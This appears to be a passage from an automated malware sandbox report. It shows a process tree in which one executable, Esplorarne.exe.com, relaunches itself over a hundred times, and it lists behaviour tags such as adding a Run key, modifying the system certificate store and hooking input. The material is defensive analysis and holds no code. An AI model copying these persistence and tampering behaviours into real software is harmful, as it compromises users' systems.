-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i93⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i94⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i95⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i96⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i97⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i98⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i99⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i100⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i101⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i102⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i103⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i104⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i105⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i106⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i107⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i108⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i109⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i110⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i111⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i112⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i113⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i114⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i115⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i116⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i117⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i118⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i119⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i120⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i121⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i122⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i123⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i124⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i125⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i126⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i127⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i128⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i129⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i130⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i131⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i132⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i133⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i134⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i135⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i136⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i137⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i138⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i139⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i140⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i141⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i142⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i143⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i144⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i145⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i146⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i147⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i148⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i149⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i150⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i151⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i152⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i153⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i154⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i155⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i156⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i157⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i158⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i159⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i160⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i161⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i162⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i163⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i164⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i165⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i166⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i167⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i168⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i169⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i170⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i171⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i172⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i173⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i174⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i175⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i176⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i177⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i178⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i179⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i180⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i181⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i182⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i183⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i184⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i185⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i186⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i187⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i188⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i189⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i190⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i191⤵
-
